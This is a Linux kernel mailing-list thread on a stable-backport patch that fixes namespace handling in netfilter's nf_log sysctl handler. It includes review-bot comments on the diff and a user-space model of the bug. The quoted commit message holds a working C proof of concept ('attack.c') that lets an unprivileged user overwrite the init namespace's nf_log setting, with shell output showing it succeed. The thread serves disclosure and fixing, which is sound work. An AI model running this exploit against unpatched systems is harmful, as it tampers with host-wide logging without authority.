From: Pablo Neira Ayuso <pablo@netfilter.org>
To: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: linux-kernel@vger.kernel.org, stable@vger.kernel.org,
Jann Horn <jann@thejh.net>
Subject: Re: [PATCH 4.4 38/38] netfilter: fix namespace handling in nf_log_proc_dostring
Date: Thu, 17 Nov 2016 12:03:48 +0100
Message-ID: <20161117110348.GA3222@salvia>
In-Reply-To: <20161117103238.093810832@linuxfoundation.org>
Greg,
Thanks a lot for picking up this one!
I have more stable stuff for netfilter; I can prepare a batch for you.
I'll keep it small and only urgent stuff.
Let me know if that's fine with you.
On Thu, Nov 17, 2016 at 11:33:16AM +0100, Greg Kroah-Hartman wrote:
> 4.4-stable review patch. If anyone has any objections, please let me know.
>
> ------------------
>
> From: Jann Horn <jann@thejh.net>
>
> commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
>
> nf_log_proc_dostring() used current's network namespace instead of the one
> corresponding to the sysctl file the write was performed on. Because the
> permission check happens at open time and the nf_log files in namespaces
> are accessible for the namespace owner, this can be abused by an
> unprivileged user to effectively write to the init namespace's nf_log
> sysctls.
>
> Stash the "struct net *" in extra2 - data and extra1 are already used.
>
> Repro code:
>
> #define _GNU_SOURCE
> #include <stdlib.h>
> #include <sched.h>
> #include <err.h>
> #include <sys/mount.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <fcntl.h>
> #include <unistd.h>
> #include <string.h>
> #include <stdio.h>
>
> char child_stack[1000000];
>
> uid_t outer_uid;
> gid_t outer_gid;
> int stolen_fd = -1;
>
> void writefile(char *path, char *buf) {
>     int fd = open(path, O_WRONLY);
>     if (fd == -1)
>         err(1, "unable to open thing");
>     if (write(fd, buf, strlen(buf)) != strlen(buf))
>         err(1, "unable to write thing");
>     close(fd);
> }
>
> int child_fn(void *p_) {
>     if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
>               NULL))
>         err(1, "mount");
>
>     /* Yes, we need to set the maps for the net sysctls to recognize us
>      * as namespace root.
>      */
>     char buf[1000];
>     sprintf(buf, "0 %d 1\n", (int)outer_uid);
>     writefile("/proc/1/uid_map", buf);
>     writefile("/proc/1/setgroups", "deny");
>     sprintf(buf, "0 %d 1\n", (int)outer_gid);
>     writefile("/proc/1/gid_map", buf);
>
>     stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
>     if (stolen_fd == -1)
>         err(1, "open nf_log");
>     return 0;
> }
>
> int main(void) {
>     outer_uid = getuid();
>     outer_gid = getgid();
>
>     int child = clone(child_fn, child_stack + sizeof(child_stack),
>                       CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
>                       |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
>     if (child == -1)
>         err(1, "clone");
>     int status;
>     if (wait(&status) != child)
>         err(1, "wait");
>     if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
>         errx(1, "child exit status bad");
>
>     char *data = "NONE";
>     if (write(stolen_fd, data, strlen(data)) != strlen(data))
>         err(1, "write");
>     return 0;
> }
>
> Repro:
>
> $ gcc -Wall -o attack attack.c -std=gnu99
> $ cat /proc/sys/net/netfilter/nf_log/2
> nf_log_ipv4
> $ ./attack
> $ cat /proc/sys/net/netfilter/nf_log/2
> NONE
>
> Because this looks like an issue with very low severity, I'm sending it to
> the public list directly.
>
> Signed-off-by: Jann Horn <jann@thejh.net>
> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
>
> ---
> net/netfilter/nf_log.c | 6 ++++--
> 1 file changed, 4 insertions(+), 2 deletions(-)
>
> --- a/net/netfilter/nf_log.c
> +++ b/net/netfilter/nf_log.c
> @@ -401,7 +401,7 @@ static int nf_log_proc_dostring(struct c
> size_t size = *lenp;
> int r = 0;
> int tindex = (unsigned long)table->extra1;
> - struct net *net = current->nsproxy->net_ns;
> + struct net *net = table->extra2;
>
> if (write) {
> if (size > sizeof(buf))
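Review bot: `net` is now taken from `table->extra2` with no NULL check, so this hunk is only correct if every entry the handler can be reached through has `extra2` populated before the table is registered, for init_net's table as well as for each per-namespace copy; the loop added later in `netfilter_log_sysctl_init` does that for indices `NFPROTO_UNSPEC` to `NFPROTO_NUMPROTO`, but a short comment at this declaration ("set for all entries at init time") would spare the next reader the cross-check, and the binding to the file's own namespace rather than `current` is the whole fix, so it deserves the remark.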
> @@ -453,7 +453,6 @@ static int netfilter_log_sysctl_init(str
> 3, "%d", i);
> nf_log_sysctl_table[i].procname =
> nf_log_sysctl_fnames[i];
> - nf_log_sysctl_table[i].data = NULL;
> nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
> nf_log_sysctl_table[i].mode = 0644;
> nf_log_sysctl_table[i].proc_handler =
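Review bot: the removal of `nf_log_sysctl_table[i].data = NULL;` is not explained by the commit message, which only notes that `data` and `extra1` are already in use; if `nf_log_sysctl_table` is a file-scope array, as its direct indexing here suggests, the field starts out zeroed anyway and this is harmless cleanup rather than part of the namespace fix, but one sentence saying so in the message (or carrying it as a separate patch) would make the stable backport easier to verify.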
> @@ -463,6 +462,9 @@ static int netfilter_log_sysctl_init(str
> }
> }
>
> + for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
> + table[i].extra2 = net;
> +
> net->nf.nf_log_dir_header = register_net_sysctl(net,
> "net/netfilter/nf_log",
> table);
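Review bot: the new loop writes `net` into `table[i].extra2` for every index from `NFPROTO_UNSPEC` up to `NFPROTO_NUMPROTO`, and because it operates on `table` rather than on `nf_log_sysctl_table` it covers both the init_net case and the per-namespace copy, which is what allows the handler to read `extra2` unconditionally; the remaining check a reviewer would want is that `extra2` is assigned before `register_net_sysctl()` can expose the table (it is, given the ordering shown here) and that the namespace exit path unregisters and frees this table before `net` itself goes away, so no handler can run against a dangling `extra2`. Since `extra2` is `void *`, a missed entry would compile silently and only surface as a bad dereference on the first write.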
>
>
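The defect the commit message describes, a sysctl handler acting on the writer's current namespace instead of the namespace the opened file belongs to, modelled in user space as an added example; this is not code from the patch, from Jann Horn or from the kernel. The types `ns_model` and `ctl_model` and the functions `dostring_vuln`, `dostring_fixed` and `init_ns_untouched` are stand-ins invented for this example in place of `struct net`, `struct ctl_table` and `nf_log_proc_dostring`; the sequence replayed is the one from the commit message: the file is opened (and permission-checked) in a child namespace, and the write arrives later while the writer is in the init namespace.

```c
/*
 * Added illustration, not kernel code: a minimal model of the nf_log sysctl
 * write handler before and after the fix. Struct and function names here are
 * assumptions made for this example, not the kernel's real identifiers.
 */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* Stand-in for per-namespace state: each net namespace owns its own
 * nf_log logger name for one protocol family. */
struct ns_model {
    const char *label;
    char nf_log[NAME_LEN];
};

/* Stand-in for struct ctl_table: the handler uses .data as scratch for the
 * logger name, .extra1 for the protocol index and, after the fix, .extra2 for
 * the namespace that owns this table. */
struct ctl_model {
    void *data;
    void *extra1;
    void *extra2;
};

typedef int (*dostring_fn)(struct ctl_model *, struct ns_model *, const char *);

/* Before the fix: the write lands in whichever namespace the *writing* task
 * currently lives in, regardless of which file was opened. */
static int dostring_vuln(struct ctl_model *table, struct ns_model *current_ns,
                         const char *buf)
{
    (void)table;
    snprintf(current_ns->nf_log, NAME_LEN, "%s", buf);
    return 0;
}

/* After the fix: the write lands in the namespace stashed in the table, i.e.
 * the one whose /proc/sys file was opened and permission-checked. */
static int dostring_fixed(struct ctl_model *table, struct ns_model *current_ns,
                          const char *buf)
{
    (void)current_ns;
    struct ns_model *owner = table->extra2;
    if (!owner)
        return -1;   /* extra2 must be populated for every entry at init */
    snprintf(owner->nf_log, NAME_LEN, "%s", buf);
    return 0;
}

/* Replays the commit message's scenario with constructed namespaces and
 * returns 1 if the init namespace's logger was left untouched, 0 if the
 * write from the child-owned fd reached it. */
static int init_ns_untouched(dostring_fn handler)
{
    struct ns_model init_ns  = { "init_net",  "nf_log_ipv4" };
    struct ns_model child_ns = { "child_net", "nf_log_ipv4" };
    /* The child's table: protocol index 2 in extra1, owning ns in extra2. */
    struct ctl_model child_table = { NULL, (void *)(unsigned long)2, &child_ns };

    /* open() in the child: the permission check runs against child_ns, which
     * the unprivileged user owns; the fd now refers to child_table. */
    struct ctl_model *fd_table = &child_table;

    /* write() later, with the writer back in init_ns. */
    handler(fd_table, &init_ns, "NONE");

    return strcmp(init_ns.nf_log, "nf_log_ipv4") == 0;
}

int main(void)
{
    printf("before fix: init_net logger untouched? %s\n",
           init_ns_untouched(dostring_vuln) ? "yes" : "no");
    printf("after fix:  init_net logger untouched? %s\n",
           init_ns_untouched(dostring_fixed) ? "yes" : "no");
    return 0;
}
```

The point the model makes is the one the fix encodes: the object a handler mutates must be the one the permission check at open time was made against, so the handler has to derive it from the file (here, `extra2` on the table) and never from the caller's current context.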